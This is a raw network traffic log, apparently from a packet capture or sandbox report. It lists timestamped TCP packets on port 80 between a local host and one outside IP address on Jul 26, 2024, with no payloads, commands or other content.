Jul 26, 2024 17:56:13.587533951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587544918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587557077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587567091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587577105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587579966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587587118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587599993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587608099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587610960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587620020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587620974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587632895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587642908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587646961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587655067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587666035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587671995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587676048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587686062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587697029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587703943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587707043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587718964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587728977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587747097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587768078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.588680029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588742971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.588828087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588840961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588850975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588869095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588876963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.588881016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588891983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588902950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588908911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.588915110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588924885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588936090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.588937044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.588953972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.588984013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.589413881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589425087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589433908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589445114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589456081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589462042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.589467049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589478016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589488983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.589490891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589502096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589508057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.589514971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589524031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.589526892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589539051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.589549065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.589581966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706088066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706100941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706110001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706120968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706137896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706147909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706160069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706171036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706178904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706185102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706214905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706228971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706240892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706254005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706264973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706275940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706290960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706301928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706314087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706325054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.706388950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706388950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706388950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706388950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706388950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706388950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.706476927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707151890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707163095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707179070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707190990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707201958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707212925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707221031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707225084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707235098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707245111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707254887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707264900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707273006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707277060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707287073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707293987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707298040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707309008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707314968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707319975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707331896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707341909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707343102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707355022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707365036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707365036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.707391024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.707410097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708051920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708069086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708080053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708097935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708106041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708108902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708120108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708132029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708141088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708142042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708152056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708163023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708173990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708178043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708184958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708195925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708199024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708219051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708242893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708244085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708252907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708262920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708275080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708292961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708322048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708833933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708844900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708854914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708864927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708874941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708878994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708885908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708897114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708913088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708915949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708925009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708935022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708935976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708947897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708956957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708959103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708971977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708982944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.708990097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.708995104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709006071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709009886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709016085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709029913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709041119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709050894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709052086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709063053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709074020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709084034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709096909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709096909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709099054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709110022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709120989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709125042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709144115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709172964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709789991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709803104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709815025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709825993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709836960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709849119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709851980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709868908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709880114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709891081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709903002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709904909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709916115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709927082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709929943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709938049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709949017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709950924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709963083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709969044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709968090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.709976912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709988117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.709991932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.710001945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710011959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.710015059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710026979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710037947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710048914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710056067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.710059881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710077047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.710095882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.710114002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.710707903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710720062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.710755110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.221828938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.221841097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.221852064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.221863031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.221957922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.222138882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222150087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222161055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222172976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222183943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222193956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222194910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.222209930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222223997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222374916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.222374916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.222374916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.222758055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222769022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.222815037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223480940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223491907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223503113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223532915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223551989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223602057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223614931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223624945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223635912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223647118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223649979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223658085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223666906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223669052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223680019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223691940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223699093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223702908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223715067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223726988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223726988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223736048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223746061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223748922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223759890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.223778963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.223807096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224371910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224389076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224400043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224411964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224419117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224422932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224432945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224443913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224450111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224456072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224464893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224477053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224499941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224507093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224509954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224522114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224531889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224543095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224550009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224553108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224564075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224575043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224582911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224586010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224596977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224606991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224628925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224668026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224668026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224945068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224957943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224982023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.224992037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.224992037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225004911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225012064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225017071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225037098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225055933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225096941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225109100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225120068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225131035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225137949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225142002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225152969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225163937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225172043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225173950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225184917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225195885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.225205898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225230932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.225238085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.226887941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.226937056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.227232933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.227277040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.228977919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.229032040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.264720917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.271548033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446520090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446533918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446546078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446557999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446724892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.446724892 CEST	49704	80	192.168.2.5	85.28.47.31
